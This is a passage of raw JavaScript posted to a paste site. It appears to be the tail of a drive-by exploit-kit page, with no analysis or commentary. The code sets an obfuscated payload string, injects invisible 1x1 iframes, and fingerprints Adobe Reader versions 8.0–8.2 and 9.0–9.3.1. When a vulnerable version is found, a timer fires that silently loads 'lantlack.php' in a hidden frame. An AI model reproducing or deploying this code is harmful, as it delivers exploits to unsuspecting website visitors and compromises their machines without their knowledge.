  2374. rhp.setAttribute("value","V2X32h.3hkk.93X1stMNjdM0Bst.XaN31.BpXXZg8Zja:Cj8X2B0j/l/ZXVtVV/B1kNNsatiVXgX.VBCn/Mk1t3.sf2MVNZhsaoahXXZBBs.s.VsVj9Bo0/f02f2Vy1Zsk9fj8lC9Mlg.dNc.3CCsgk8rhNXk9g2Ne2.0Cj/N8d03.l3kB3ildNjB0l/tkVl.t3N8.8kZss.t8c8./9kNVjo0sXf8CdtmfftfdNsl.0Cd2BdVZadCdgl8V2r.dl88h8s/V3M8gB/lokk31MBdCpkMtfj0lj/3dl9B.3dl8flj8thaedj2C8tjteMfhVtZ3/v0t0j.BN8a3Bl1CZ92g0CZXC0Btit/0tgC/alCChBd2Ml.gX8..V20pjjj8/23/h1B.sk3d9p");
  2375. rh.appendChild(rhp);
  2376. document.body.appendChild(rh);
  2377. }
  2378. ;function jollcord(abc)
  2379. {
  2380. var dh = document.createElement("i"+"frame");
  2381. dh.setAttribute("width", 1);
  2382. dh.setAttribute("height", 1);
  2383. dh.setAttribute("src", abc);
  2384. document.body.appendChild(dh);
  2385. }
  2386. ;function usedfage()
  2387. {
  2388. try
  2389. {
  2390. if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301))
  2391. {
  2392. jollcord("lantlack.php");
  2393. }
  2394.  
  2395. }
  2396. catch(e)
  2397. {
  2398.  
  2399. }
  2400.  
  2401. }
  2402. setTimeout(usedfage,2110);
  2403. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement